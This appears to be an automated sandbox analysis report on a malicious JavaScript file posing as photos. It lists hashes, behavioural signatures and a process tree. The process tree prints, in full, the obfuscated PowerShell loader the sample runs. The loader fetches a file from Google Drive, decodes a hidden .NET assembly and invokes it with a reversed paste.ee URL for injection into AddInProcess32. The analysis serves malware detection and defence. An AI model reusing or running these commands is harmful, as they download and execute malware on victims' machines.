Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
31-10-2024 16:58
Static task
static1
Behavioral task
behavioral1
Sample
Lana_Rhoades_Photoos.js
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Lana_Rhoades_Photoos.js
Resource
win10v2004-20241007-en
General
-
Target
Lana_Rhoades_Photoos.js
-
Size
548KB
-
MD5
ae498935d8a61b3008bd9393a2306dec
-
SHA1
b1858655d705e14c01cec8d008c3f3db0a09807b
-
SHA256
401f183d5553d4f01ff3a4df33524f39faa6138f40afb570300ae41ca31efc08
-
SHA512
8d9830e5ff3f09099ac1e1af2a585cad2a2ad287b75117741d5f940dc2dd934e7046d17881c93b0398917d1f42a9208ab17bede62a594b1a12997d2bba660a8b
-
SSDEEP
3072:0F8F8F8F8F8F8F8F8F8F8F8F8F8FjFoFoFoFoFoFoFoFoFoFoFoFoFoFoFoFoFod:X7HlvYPobr777lvrFI
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 2084 wscript.exe 4 2084 wscript.exe 8 2460 powershell.exe 10 2460 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1156 powershell.exe 2460 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 drive.google.com 8 drive.google.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1156 powershell.exe 2460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2084 wrote to memory of 1156 2084 wscript.exe 31 PID 2084 wrote to memory of 1156 2084 wscript.exe 31 PID 2084 wrote to memory of 1156 2084 wscript.exe 31 PID 1156 wrote to memory of 2460 1156 powershell.exe 33 PID 1156 wrote to memory of 2460 1156 powershell.exe 33 PID 1156 wrote to memory of 2460 1156 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Lana_Rhoades_Photoos.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAJwArACcAaABCAFkAdwB1AHIAIABaADQAUwA7AFQAMgBIAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgACcAKwAnAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQAnACsAJwBuAHQAOwBUADIASABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAMgAnACsAJwBIAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUADIASABpAG0AYQBnAGUAVQByAGwAKQA7AFQAMgBIAGkAbQBhACcAKwAnAGcAZQBUAGUAeAAnACsAJwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAFQAMgBIAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAMgBIAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAFMAJwArACcAVABBAFIAVAA+AD4AWgA0AFMAOwAnACsAJwBUADIASABlAG4AZABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBaACcAKwAnADQAJwArACcAUwA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVAAyAEgAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVAAyAEgAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAMgBIAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABUADIASABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkACcAKwAnAGUAeABPAGYAKABUADIASABlAG4AZABGAGwAYQBnACkAOwBUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFQAMgBIAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVAAyAEgAcwB0AGEAcgB0AEkAbgBkACcAKwAnAGUAeAA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAnACsAJwBUADIASABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVAAyAEgAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACcAKwAnACAAVAAyAEgAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAOwBUADIASABiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFQAMgBIAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACwAIABUADIASABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVAAyAEgAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABWAEcAcQAgAEYAbwAnACsAJwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABUADIASABfACAAfQApAFsALQAnACsAJwAxACcAKwAnAC4ALgAtACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFQAMgBIAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAJwArACcAaQBuAGcAKABUADIASABiAGEAcwBlADYANABSAGUAdgBlACcAKwAnAHIAcwBlAGQAKQA7AFQAMgBIAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAJwArACcAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAVAAyAEgAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AFQAMgBIAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACsAJwBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABaADQAUwBWAEEASQBaADQAUwApADsAVAAyAEgAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgAnACsAJwBvAGsAZQAoAFQAMgBIAG4AdQBsAGwALAAgAEAAKABaADQAUwAwAC8ANABLAHoAJwArACcAegB1AC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAWgA0AFMAJwArACcALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBaADQAJwArACcAUwAsACAAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAbwBaADQAUwAsACAAWgA0AFMAZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBaADQAUwAnACsAJwAsAFoANABTAGQAJwArACcAZQAnACsAJwBzAGEAdABpAHYAYQAnACsAJwBkAG8AWgA0AFMALABaADQAJwArACcAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALABaADQAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAMQBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMAKQApADsAJwApACAALQBDAHIAZQBQAGwAYQBDAEUAIAAgACcAVAAyAEgAJwAsAFsAQwBoAGEAUgBdADMANgAtAFIAZQBQAGwAQQBjAEUAIAAgACcAWgA0AFMAJwAsAFsAQwBoAGEAUgBdADMAOQAgAC0AQwByAGUAUABsAGEAQwBFACcAVgBHAHEAJwAsAFsAQwBoAGEAUgBdADEAMgA0ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IEX( (('T2HimageUrl = Z4Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur Z4S;T2HwebClient = '+'New-Object System.Net.WebClie'+'nt;T2HimageBytes = T2'+'HwebClient.DownloadData(T2HimageUrl);T2Hima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetSt'+'ring(T2HimageBytes);T2HstartFlag = Z4S<<BASE64_S'+'TART>>Z4S;'+'T2HendFlag = Z4S<<BASE64_END>>Z'+'4'+'S;T2HstartIndex = T2HimageText.IndexOf(T2HstartFlag);T2HendInd'+'ex = T2HimageText.Ind'+'exOf(T2HendFlag);T2HstartIndex -'+'ge 0 -and T2HendIndex -gt T2HstartInd'+'ex;T2HstartIndex += '+'T2HstartFlag.Length;T2Hbase64Length ='+' T2HendIndex - T2HstartIndex;T2Hbas'+'e64Command = T2HimageText.Substring(T2HstartIndex, T2Hbase64Length);T2Hbase64Reversed = -join (T2Hbase64Command.'+'ToCharArray() VGq Fo'+'rEach-Object { T2H_ })[-'+'1'+'..-(T2Hbase64Command.Length)];T2HcommandBytes = [System'+'.Convert]::FromBase64Str'+'ing(T2Hbase64Reve'+'rsed);T2HloadedAssembly = [System.Reflection.Asse'+'mbly]::Load(T2HcommandBytes);T2HvaiMethod = [dnlib.IO.Home'+'].GetMethod(Z4SVAIZ4S);T2HvaiMethod.Inv'+'oke(T2Hnull, @(Z4S0/4Kz'+'zu/d/ee.etsap//:sptthZ4S'+', Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SAddInProcess32Z4'+'S, Z4SdesativadoZ4S, Z4Sdesat'+'ivadoZ4S'+',Z4Sd'+'e'+'sativa'+'doZ4S,Z4'+'SdesativadoZ4S,Z4Sdesativad'+'oZ4S,Z4SdesativadoZ4S,Z4SdesativadoZ4S,Z4S1Z4S,Z4SdesativadoZ4S));') -CrePlaCE 'T2H',[ChaR]36-RePlAcE 'Z4S',[ChaR]39 -CrePlaCE'VGq',[ChaR]124))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5856079b9fd6f6f57501d37500c3d82a4
SHA1fc10657a1bc61f97d5613d6ad705e339b577de57
SHA256b7a1ed16b74f25db37845265e1d21d18c56c7124b592be4a54a5dd47a26e918c
SHA512ffdc5686ed12db1e8b011d6e142b2cf1f0e9a93daad32b1a925d1516691b54cf107359ac3ae46941da15776ffe15de16108ba778ce423475470058fbd3d1d5fa